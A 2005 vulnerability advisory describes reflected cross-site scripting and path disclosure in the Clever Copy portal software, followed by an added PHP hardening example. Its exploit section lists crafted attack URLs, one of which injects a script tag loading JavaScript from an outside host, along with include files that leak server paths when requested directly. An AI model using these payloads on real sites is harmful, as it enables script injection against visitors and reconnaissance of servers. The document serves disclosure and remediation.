################################################
Clever copy Path disclosure and multiple XSS
vendor url: http://clevercopy.bestdirectbuy.com
advisory: http://lostmon.blogspot.com/2005/07/clever-copy-path-disclosure-and-xss.html
vendor notify: yes
exploit available: yes
################################################

Clever Copy is a free, fully scalable web site portal and news posting system. You can run it as a very simple blog or ramp it up to a full Content Management System.

Clever Copy contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'searchtype' and 'searchterm' variables upon submission to the 'results.php' and 'categorysearch.php' scripts. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

##############
VERSIONS
##############
Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############
No solution at this time

##############
TIMELINE
##############
Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005

##############
EXPLOITS
##############
http://[VICTIM]/results.php?searchtype=">category&searchterm=Announcements
http://[VICTIM]/results.php?searchtype=category&searchterm=">Announcements
http://[VICTIM]/results.php?start=0&searchtype=">
http://[VICTIM]/categorysearch.php?star=0&searchtype="><script src="http://www.drorshalev.com/dev/injection/js.js">category&searchterm=Announcements
http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&searchterm=Announcements">

################################
direct request path disclosure:
################################
http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php

########################
End
#############################

Thanks to estrella for being my light
thanks to http://www.drorshalev.com for hosting the 'js.js' script

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
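The two findings above (reflected XSS via 'searchtype'/'searchterm' and path disclosure on directly requested include files) have standard fixes that the advisory does not spell out. The following is an added illustrative PHP example, not Clever Copy's own code: the parameter names come from the advisory, while the IN_CLEVERCOPY constant, the allow-list values and the markup are assumptions.

```php
<?php
// Added illustrative hardening for a results.php-style handler (not Clever Copy's code).
// Parameter names (searchtype, searchterm, start) are from the advisory; the allow-list,
// the IN_CLEVERCOPY constant and the output markup are assumptions.

// Path-disclosure mitigation: include-only fragments (ticker.php, menu.php, ...) call this
// first, so a direct request gets a 404 instead of a PHP error that prints the server path.
// IN_CLEVERCOPY is an assumed constant only the front controller defines before including.
function guardDirectRequest(): void
{
    if (!defined('IN_CLEVERCOPY')) {
        header('HTTP/1.1 404 Not Found');
        exit;
    }
}

// XSS mitigation: allow-list the enumerated parameter, encode the free-text parameter at
// the output point, and cast the numeric one, so nothing is reflected raw into HTML.
function renderSearchForm(array $get): string
{
    $allowedTypes = ['category', 'title', 'author'];   // assumed; 'category' is from the advisory
    $searchtype = $get['searchtype'] ?? 'category';
    if (!in_array($searchtype, $allowedTypes, true)) {
        $searchtype = 'category';                      // never echo an unexpected value back
    }

    // ENT_QUOTES also encodes the double quote that would close a value="..." attribute.
    $safeTerm = htmlspecialchars(trim((string)($get['searchterm'] ?? '')),
                                 ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $start = max(0, (int)($get['start'] ?? 0));

    return '<form method="get" action="results.php">'
         . '<input type="hidden" name="searchtype" value="' . $searchtype . '">'
         . '<input type="text" name="searchterm" value="' . $safeTerm . '">'
         . '<input type="hidden" name="start" value="' . $start . '">'
         . '</form>'
         . '<p>Results for ' . $safeTerm . ' in ' . $searchtype . '</p>';
}

// Constructed sample input: the closing quote and angle brackets come out encoded,
// the unknown searchtype falls back to 'category', and the negative start becomes 0.
echo renderSearchForm(['searchtype' => '">x', 'searchterm' => '"><b>hi</b>', 'start' => '-3']);
```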